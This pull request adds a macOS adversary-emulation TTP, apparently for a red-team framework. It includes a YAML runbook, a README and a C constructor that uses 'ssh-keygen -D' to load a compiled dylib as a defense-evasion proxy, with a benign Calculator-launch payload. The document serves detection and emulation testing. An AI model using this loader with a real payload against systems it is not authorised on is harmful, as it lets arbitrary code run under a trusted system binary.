### PR TITLE
add ssh-keygen load dylib ttp

### DIFF
--- a/ttps/macOS/sshkeygen_load_dylib/README.md
+++ b/ttps/macOS/sshkeygen_load_dylib/README.md
@@ -1,0 +1,31 @@
+# Load dylib via ssh-keygen
+
+![Community TTP - VVX7](https://img.shields.io/badge/Community_TTP-green)
+
+Loads a custom dylib (which opens Calculator) via ssh-keygen.
+
+## Arguments
+
+- **cleanup**: When set to true, it will delete the compiled dylib.
+
+## Pre-requisites
+
+Ensure that `gcc` is installed and that you have permission to run it.
+
+## Examples
+
+Execute `ssh-keygen -D` to load a dylib. Once execution is complete, 
+this TTP will delete the generated `calc.dylib` file if cleanup is
+set to true:
+
+```bash
+ttpforge run ttps/macOS/sshkeygen_load_dylib/sshkeygen_load_dylib.yaml
+```
+
+## Steps
+
+1. **Setup**: Compile the dylib that is loaded by ssh-keygen.
+
+1. **Load Dylib**: Execute `ssh-keygen -D` to load the dylib.
+
+1. **Cleanup**: If the `cleanup` argument is set to `true`, delete the compiled dylib.

--- a/ttps/macOS/sshkeygen_load_dylib/README.md
+++ b/ttps/macOS/sshkeygen_load_dylib/README.md
@@ -14,7 +14,7 @@ Ensure that `gcc` is installed and that you have permission to run it.
 
 ## Examples
 
-Execute `ssh-keygen -D` to load a dylib. Once execution is complete, 
+Execute `ssh-keygen -D` to load a dylib. Once execution is complete,
 this TTP will delete the generated `calc.dylib` file if cleanup is
 set to true:
 

--- a/ttps/macOS/sshkeygen_load_dylib/calc.c
+++ b/ttps/macOS/sshkeygen_load_dylib/calc.c
@@ -1,0 +1,10 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int system(const char *command);
+
+__attribute__((constructor))
+static void customConstructor(int argc, const char **argv)
+{
+	system("open -a Calculator.app");
+}

--- a/ttps/macOS/sshkeygen_load_dylib/sshkeygen_load_dylib.yaml
+++ b/ttps/macOS/sshkeygen_load_dylib/sshkeygen_load_dylib.yaml
@@ -1,0 +1,25 @@
+---
+name: ssh-keygen load dylib
+description: |
+  This TTP loads a custom dylib (which opens Calculator) via ssh-keygen.
+mitre:
+  tactics:
+    - T0005 Defense Evasion
+  techniques:
+    - T1218 System Binary Proxy Execution
+steps:
+  - name: setup
+    inline: |
+      echo "First building the source c file into a dylib..."
+      gcc -dynamiclib calc.c -o calc.dylib
+      echo "Calc dylib compiled!"
+  - name: load-dylib
+    inline: |
+      echo "Next, loading the compiled dylib via ssh-keygen..."
+      ssh-keygen -D `pwd`/calc.dylib
+      echo "TTP Done!"
+    cleanup:
+      inline: |
+        echo "Removing the compiled calc.dylib binary..."
+        rm calc.dylib
+        echo "Cleanup Finished!"


### PR DESCRIPTION
# Proposed Changes

Add ssh-keygen load dylib ttp.
reference: https://www.loobins.io/binaries/ssh-keygen/

## Related Issue(s)

n/a

## Testing

Tested and confirmed working in local environment.

## Documentation

See README.md

## Screenshots/GIFs (optional)

n/a

## Checklist

- [x] Ran `mage runprecommit` locally and fixed any issues that arose.
- [x] Curated your commit(s) so they are legible and easy to read and understand.
- [x] 🚀
